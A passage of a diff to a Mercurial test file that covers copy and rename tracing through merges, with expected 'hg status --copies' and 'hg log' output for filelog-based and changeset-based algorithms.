merge while there is none. 
@@ -1278,90 +2506,196 @@ - one overwriting a file (d) with a rename (from h to i to d) $ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))' - o 24 mFBm-0 simple merge - the other way + o mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way |\ - +---o 23 mBFm-0 simple merge - one way + +---o mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way | |/ - | o 22 f-2: rename i -> d + | o f-2: rename i -> d | | - | o 21 f-1: rename h -> i + | o f-1: rename h -> i | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBFm-0")' M b A d h + A t + p R a R h + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFBm-0")' M b A d h + A t + p R a R h + R p $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBFm-0")' - M d - h (no-filelog !) + M d (no-changeset !) + h (no-filelog no-changeset !) R h $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mBFm-0")' M b $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mBFm-0")' M b - M d - i (no-filelog !) + M d (no-changeset !) + i (no-filelog no-changeset !) R i $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mFBm-0")' - M d - h (no-filelog !) + M d (no-changeset !) + h (no-filelog no-changeset !) R h $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFBm-0")' M b $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mFBm-0")' M b - M d - i (no-filelog !) + M d (no-changeset !) + i (no-filelog no-changeset !) 
R i #if no-changeset $ hg log -Gfr 'desc("mBFm-0")' d - o 22 f-2: rename i -> d + o f-2: rename i -> d | - o 21 f-1: rename h -> i + o f-1: rename h -> i : - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mBFm-0")' d - o 22 f-2: rename i -> d + o i-2: c -move-> d, s -move-> t | ~ #endif #if no-changeset $ hg log -Gfr 'desc("mFBm-0")' d - o 22 f-2: rename i -> d + o f-2: rename i -> d | - o 21 f-1: rename h -> i + o f-1: rename h -> i : - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mFBm-0")' d - o 22 f-2: rename i -> d + o i-2: c -move-> d, s -move-> t | ~ #endif +Subcase: existing copy information overwritten on one branch, with different content) +````````````````````````````````````````````````````````````````````````````````````` + +Merge: +- one with change to an unrelated file (b) +- one overwriting a file (t) with a rename (from r to x to t), v content is not the same as on the other branch + + $ hg log -G --rev '::(desc("mBRm")+desc("mRBm"))' + o mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way + |\ + +---o mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way + | |/ + | o r-2: rename t -> x + | | + | o r-1: rename r -> x + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBRm-0")' + M b + A d + a + A t + r + R a + R p + R r + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mRBm-0")' + M b + A d + a + A t + r + R a + R p + R r + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBRm-0")' + M t + r (no-filelog !) 
+ R r + $ hg status --copies --rev 'desc("r-2")' --rev 'desc("mBRm-0")' + M b + $ hg status --copies --rev 'desc("r-1")' --rev 'desc("mBRm-0")' + M b + M t + x (no-filelog !) + R x + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mRBm-0")' + M t + r (no-filelog !) + R r + $ hg status --copies --rev 'desc("r-2")' --rev 'desc("mRBm-0")' + M b + $ hg status --copies --rev 'desc("r-1")' --rev 'desc("mRBm-0")' + M b + M t + x (no-filelog !) + R x + +#if no-changeset + $ hg log -Gfr 'desc("mBRm-0")' d + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + +#else +BROKEN: `hg log --follow <file>` relies on filelog metadata to work + $ hg log -Gfr 'desc("mBRm-0")' d + o i-2: c -move-> d, s -move-> t + | + ~ +#endif + +#if no-changeset + $ hg log -Gfr 'desc("mRBm-0")' d + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + +#else +BROKEN: `hg log --follow <file>` relies on filelog metadata to work + $ hg log -Gfr 'desc("mRBm-0")' d + o i-2: c -move-> d, s -move-> t + | + ~ +#endif + +Subcase: reset of the copy history on one side +`````````````````````````````````````````````` + Merge: - one with change to a file - one deleting and recreating the file @@ -1370,21 +2704,21 @@ consider history and rename on both branch of the merge. 
$ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))' - o 27 mGDm-0 simple merge - the other way + o mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way |\ - +---o 26 mDGm-0 simple merge - one way + +---o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d | | - o | 7 d-1 delete d + o | d-1 delete d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r One side of the merge have a long history with rename. The other side of the merge point to a new file with a smaller history. Each side is "valid". @@ -1395,11 +2729,17 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mDGm-0")' A d a (filelog !) + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGDm-0")' A d a + A t + p R a + R p $ hg status --copies --rev 'desc("d-2")' --rev 'desc("mDGm-0")' M d $ hg status --copies --rev 'desc("d-2")' --rev 'desc("mGDm-0")' @@ -1411,28 +2751,28 @@ #if no-changeset $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 simple merge - one way + o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 simple merge - one way + o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different 
content), G side: update content - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | ~ #endif @@ -1440,32 +2780,34 @@ #if no-changeset $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 simple merge - one way + o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 simple merge - one way + o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | ~ #endif +Subcase: merging a change to a file with a "copy overwrite" to that file from another branch +```````````````````````````````````````````````````````````````````````````````````````````` Merge: - one with change to a file (d) @@ -1476,21 +2818,21 @@ $ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))' - o 29 mGFm-0 simple merge - the other way + o mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ - +---o 28 mFGm-0 simple merge - one way + +---o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> 
c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Note: @@ -1504,15 +2846,15 @@ Details on this hash ordering pick: $ hg manifest --debug 'desc("g-1")' | egrep 'd$' - f2b277c39e0d2bbac99d8aae075c0d8b5304d266 644 d (no-changeset !) - 4ff57b4e8dceedb487e70e6965ea188a7c042cca 644 d (changeset !) + 17ec97e605773eb44a117d1136b3849bcdc1924f 644 d (no-changeset !) + 5cce88bf349f7c742bb440f2c53f81db9c294279 644 d (changeset !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("g-1")' d A d a (no-changeset no-compatibility !) $ hg manifest --debug 'desc("f-2")' | egrep 'd$' - 4a067cf8965d1bfff130057ade26b44f580231be 644 d (no-changeset !) - fe6f8b4f507fe3eb524c527192a84920a4288dac 644 d (changeset !) + 7b79e2fe0c8924e0e598a82f048a7b024afa4d96 644 d (no-changeset !) + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 d (changeset !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("f-2")' d A d h (no-changeset no-compatibility !) @@ -1521,15 +2863,22 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFGm-0")' A d - h + h (no-filelog !) + a (filelog !) + A t + p R a R h + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGFm-0")' A d - a (no-filelog !) - h (filelog !) + a (no-changeset !) + h (changeset !) + A t + p R a R h + R p $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFGm-0")' M d $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mGFm-0")' @@ -1543,74 +2892,194 @@ i (no-filelog !) R i $ hg status --copies --rev 'desc("g-1")' --rev 'desc("mFGm-0")' - M d - h (no-filelog !) + M d (no-changeset !) + h (no-filelog no-changeset !) R h $ hg status --copies --rev 'desc("g-1")' --rev 'desc("mGFm-0")' - M d - h (no-filelog !) + M d (no-changeset !) + h (no-filelog no-changeset !) 
R h #if no-changeset $ hg log -Gfr 'desc("mFGm-0")' d - o 28 mFGm-0 simple merge - one way + o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mFGm-0")' d - o 28 mFGm-0 simple merge - one way - |\ - | o 25 g-1: update d - | | - o | 22 f-2: rename i -> d - |/ - o 2 i-2: c -move-> d + o g-1: update d + | + o i-2: c -move-> d, s -move-> t | ~ #endif #if no-changeset $ hg log -Gfr 'desc("mGFm-0")' d - o 29 mGFm-0 simple merge - the other way + o mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mGFm-0")' d - o 29 mGFm-0 simple merge - the other way - |\ - | o 25 g-1: update d - | | - o | 22 f-2: rename i -> d - |/ - o 2 i-2: c -move-> d + o g-1: update d + | + o i-2: c -move-> d, s -move-> t | ~ #endif +Subcase: new copy information on both side with an actual merge happening +````````````````````````````````````````````````````````````````````````` + +- the "p-" branch renaming 't' to 'v' (through 'u') +- the "q-" branch renaming 'r' to 'v' (through 'w') + + + $ hg log -G --rev '::(desc("mPQm")+desc("mQPm"))' 
+ o mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way + |\ + +---o mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way + | |/ + | o q-2 w -move-> v + | | + | o q-1 r -move-> w + | | + o | p-2: u -move-> v + | | + o | p-1: t -move-> u + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +#if no-changeset + $ hg manifest --debug --rev 'desc("mPQm-0")' | grep '644 v' + 0946c662ef16e4e67397fd717389eb6693d41749 644 v + $ hg manifest --debug --rev 'desc("mQPm-0")' | grep '644 v' + 0db3aad7fcc1ec27fab57060e327b9e864ea0cc9 644 v + $ hg manifest --debug --rev 'desc("p-2")' | grep '644 v' + 3f91841cd75cadc9a1f1b4e7c1aa6d411f76032e 644 v + $ hg manifest --debug --rev 'desc("q-2")' | grep '644 v' + c43c088b811fd27983c0a9aadf44f3343cd4cd7e 644 v + $ hg debugindex v | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * 3f91841cd75c 000000000000 000000000000 + 1 * c43c088b811f 000000000000 000000000000 + 2 * 0946c662ef16 3f91841cd75c c43c088b811f + 3 * 0db3aad7fcc1 c43c088b811f 3f91841cd75c +#else + $ hg manifest --debug --rev 'desc("mPQm-0")' | grep '644 v' + 65fde9f6e4d4da23b3f610e07b53673ea9541d75 644 v + $ hg manifest --debug --rev 'desc("mQPm-0")' | grep '644 v' + a098dda6413aecf154eefc976afc38b295acb7e5 644 v + $ hg manifest --debug --rev 'desc("p-2")' | grep '644 v' + 5aed6a8dbff0301328c08360d24354d3d064cf0d 644 v + $ hg manifest --debug --rev 'desc("q-2")' | grep '644 v' + a38b2fa170219750dac9bc7d19df831f213ba708 644 v + $ hg debugindex v | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * 5aed6a8dbff0 000000000000 000000000000 + 1 * a38b2fa17021 000000000000 000000000000 + 2 * 65fde9f6e4d4 5aed6a8dbff0 a38b2fa17021 + 3 * a098dda6413a a38b2fa17021 5aed6a8dbff0 +#endif + +# Here the filelog based implementation is not looking at the rename +# information (because the file exist on 
both side). However the changelog +# based on works fine. We have different output. + + $ hg status --copies --rev 'desc("p-2")' --rev 'desc("mPQm-0")' + M v + r (no-filelog !) + R r + $ hg status --copies --rev 'desc("p-2")' --rev 'desc("mQPm-0")' + M v + r (no-filelog !) + R r + $ hg status --copies --rev 'desc("q-2")' --rev 'desc("mPQm-0")' + M v + t (no-filelog !) + R t + $ hg status --copies --rev 'desc("q-2")' --rev 'desc("mQPm-0")' + M v + t (no-filelog !) + R t + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("p-2")' + A v + t + R t + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("q-2")' + A v + r + R r + +# From here, we run status against revision where both source file exists. +# +# The filelog based implementation picks an arbitrary side based on revision +# numbers. So the same side "wins" whatever the parents order is. This is +# sub-optimal because depending on revision numbers means the result can be +# different from one repository to the next. +# +# The changeset based algorithm use the parent order to break tie on conflicting +# information and will have a different order depending on who is p1 and p2. +# That order is stable accross repositories. (data from p1 prevails) + + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mPQm-0")' + A v + t + R r + R t + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mQPm-0")' + A v + t (filelog !) + r (no-filelog !) + R r + R t + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQm-0")' + A d + a + A v + r (filelog !) + p (no-filelog !) + R a + R p + R r + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQPm-0")' + A d + a + A v + r + R a + R p + R r + Comparing with merging with a deletion (and keeping the file) ------------------------------------------------------------- @@ -1624,19 +3093,19 @@ copy tracing chain. 
$ hg log -G --rev '::(desc("mCGm")+desc("mGCm"))' - o 31 mGCm-0 + o mGCm-0 merge updated/deleted - revive the file (updated content) - the other way |\ - +---o 30 mCGm-0 + +---o mCGm-0 merge updated/deleted - revive the file (updated content) - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 6 c-1 delete d + o | c-1 delete d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r 'a' is the copy source of 'd' @@ -1644,11 +3113,17 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCGm-0")' A d a (no-compatibility no-changeset !) + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGCm-0")' A d a (no-compatibility no-changeset !) + A t + p R a + R p $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCGm-0")' A d $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mGCm-0")' @@ -1669,19 +3144,19 @@ copy tracing chain. $ hg log -G --rev '::(desc("mCB-revert-m")+desc("mBC-revert-m"))' - o 33 mBC-revert-m-0 + o mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way |\ - +---o 32 mCB-revert-m-0 + +---o mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way | |/ - | o 6 c-1 delete d + | o c-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r 'a' is the the copy source of 'd' @@ -1690,12 +3165,18 @@ M b A d a (no-compatibility no-changeset !) + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-revert-m-0")' M b A d a (no-compatibility no-changeset !) 
+ A t + p R a + R p $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCB-revert-m-0")' M b A d @@ -1715,31 +3196,37 @@ (the copy information from the branch that was not deleted should win). $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))' - o 36 mHC-delete-before-conflict-m-0 + o mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way |\ - +---o 35 mCH-delete-before-conflict-m-0 + +---o mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way | |/ - | o 34 h-1: b -(move)-> d + | o h-1: b -(move)-> d | | - o | 6 c-1 delete d + o | c-1 delete d | | - o | 2 i-2: c -move-> d + o | i-2: c -move-> d, s -move-> t | | - o | 1 i-1: a -move-> c + o | i-1: a -move-> c, p -move-> s |/ - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCH-delete-before-conflict-m")' A d b (no-compatibility no-changeset !) 
+ A t + p R a R b + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mHC-delete-before-conflict-m")' A d b + A t + p R a R b + R p $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCH-delete-before-conflict-m")' A d b @@ -1749,6 +3236,586 @@ b R b $ hg status --copies --rev 'desc("h-1")' --rev 'desc("mCH-delete-before-conflict-m")' + A t + p R a + R p $ hg status --copies --rev 'desc("h-1")' --rev 'desc("mHC-delete-before-conflict-m")' + A t + p R a + R p + +Variant of previous with extra changes introduced by the merge +-------------------------------------------------------------- + +(see case declaration for details) + +Subcase: merge has same initial content on both side, but merge introduced a change +``````````````````````````````````````````````````````````````````````````````````` + +- the "e-" branch renaming b to f (through 'g') +- the "a-" branch renaming d to f (through e) +- the merge add new change to b + + $ hg log -G --rev '::(desc("mAE-change-m")+desc("mEA-change-m"))' + o mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way + |\ + +---o mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way + | |/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + +#if no-changeset + $ hg manifest --debug --rev 'desc("mAE-change-m-0")' | grep '644 f' + 2f649fba7eb284e720d02b61f0546fcef694c045 644 f + $ hg manifest --debug --rev 'desc("mEA-change-m-0")' | grep '644 f' + 774e7c1637d536b99e2d8ef16fd731f87a82bd09 644 f + $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' + b76eb76580df486c3d51d63c5c210d4dd43a8ac7 644 f + $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' + 
e8825b386367b29fec957283a80bb47b47483fe1 644 f + $ hg debugindex f | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * b76eb76580df 000000000000 000000000000 + 1 * e8825b386367 000000000000 000000000000 + 2 * 2ff93c643948 b76eb76580df e8825b386367 + 3 * 2f649fba7eb2 b76eb76580df e8825b386367 + 4 * 774e7c1637d5 e8825b386367 b76eb76580df +#else + $ hg manifest --debug --rev 'desc("mAE-change-m-0")' | grep '644 f' + d3613c1ec8310a812ac4268fd853ac576b6caea5 644 f + $ hg manifest --debug --rev 'desc("mEA-change-m-0")' | grep '644 f' + 05e03c868bbcab4a649cb33a238d7aa07398a469 644 f + $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f + $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f + $ hg debugindex f | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * ae258f702dfe 000000000000 000000000000 + 1 * d3613c1ec831 ae258f702dfe 000000000000 + 2 * 05e03c868bbc ae258f702dfe 000000000000 +#endif + +# Here the filelog based implementation is not looking at the rename +# information (because the file exist on both side). However the changelog +# based on works fine. We have different output. + + $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mAE-change-m-0")' + M f + b (no-filelog !) + R b + $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mEA-change-m-0")' + M f + b (no-filelog !) + R b + $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mAE-change-m-0")' + M f + d (no-filelog !) + R d + $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mEA-change-m-0")' + M f + d (no-filelog !) + R d + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("a-2")' + A f + d + R d + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("e-2")' + A f + b + R b + +# From here, we run status against revision where both source file exists. +# +# The filelog based implementation picks an arbitrary side based on revision +# numbers. 
So the same side "wins" whatever the parents order is. This is +# sub-optimal because depending on revision numbers means the result can be +# different from one repository to the next. +# +# The changeset based algorithm uses the parent order to break ties on conflicting +# information and will have a different order depending on who is p1 and p2. +# That order is stable across repositories. (data from p1 prevails) + + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mAE-change-m-0")' + A f + d + R b + R d + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mEA-change-m-0")' + A f + d (filelog !) + b (no-filelog !) + R b + R d + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change-m-0")' + A f + a + A t + p + R a + R b + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change-m-0")' + A f + a (filelog !) + b (no-filelog !) + A t + p + R a + R b + R p + + +Subcase: merge overwrite common copy information, but with extra change during the merge +``````````````````````````````````````````````````````````````````````````````````` + +Merge: +- one with change to an unrelated file (b) +- one overwriting a file (d) with a rename (from h to i to d) + + $ hg log -G --rev '::(desc("mBF-change-m")+desc("mFB-change-m"))' + o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + |\ + +---o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + | |/ + | o f-2: rename i -> d + | | + | o f-1: rename h -> i + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBF-change-m-0")' + M b + A d + h (filelog !) + h (sidedata !) + h (upgraded !) + h (upgraded-parallel !) + h (changeset !) + h (compatibility !)
+ A t + p + R a + R h + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFB-change-m-0")' + M b + A d + h + A t + p + R a + R h + R p + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBF-change-m-0")' + M d + h (no-filelog !) + R h + $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mBF-change-m-0")' + M b + M d + $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mBF-change-m-0")' + M b + M d + i (no-filelog !) + R i + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mFB-change-m-0")' + M d + h (no-filelog !) + R h + $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFB-change-m-0")' + M b + M d + $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mFB-change-m-0")' + M b + M d + i (no-filelog !) + R i + +#if no-changeset + $ hg log -Gfr 'desc("mBF-change-m-0")' d + o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + |\ + o : f-2: rename i -> d + | : + o : f-1: rename h -> i + :/ + o i-0 initial commit: a b h p q r + +#else +BROKEN: `hg log --follow <file>` relies on filelog metadata to work + $ hg log -Gfr 'desc("mBF-change-m-0")' d + o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + : + o i-2: c -move-> d, s -move-> t + | + ~ +#endif + +#if no-changeset + $ hg log -Gfr 'desc("mFB-change-m-0")' d + o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + |\ + o : f-2: rename i -> d + | : + o : f-1: rename h -> i + :/ + o i-0 initial commit: a b h p q r + +#else +BROKEN: `hg log --follow <file>` relies on filelog metadata to work + $ hg log -Gfr 'desc("mFB-change-m-0")' d + o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + : + o i-2: c -move-> d, s -move-> t + | + ~ +#endif + + +Subcase: restoring and untouched deleted 
file, while touching it +```````````````````````````````````````````````````````````````` + +Merge: +- one removing a file (d) +- one leaving the file untouched +- the merge actively restores the file to the same content. + +In this case, the file keeps on living after the merge. So we should not drop its +copy tracing chain. + + $ hg log -G --rev '::(desc("mCB-change-m")+desc("mBC-change-m"))' + o mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + |\ + +---o mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + | |/ + | o c-1 delete d + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +'a' is the copy source of 'd' + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB-change-m-0")' + M b + A d + a (no-compatibility no-changeset !) + A t + p + R a + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-change-m-0")' + M b + A d + a (no-compatibility no-changeset !) + A t + p + R a + R p + $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCB-change-m-0")' + M b + A d + $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mBC-change-m-0")' + M b + A d + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mCB-change-m-0")' + M d + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBC-change-m-0")' + M d + + +Decision from previous merge are properly chained with later merge +------------------------------------------------------------------ + + +Subcase: chaining conflicting rename resolution +``````````````````````````````````````````````` + +The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We +add more change on the respective branch and merge again.
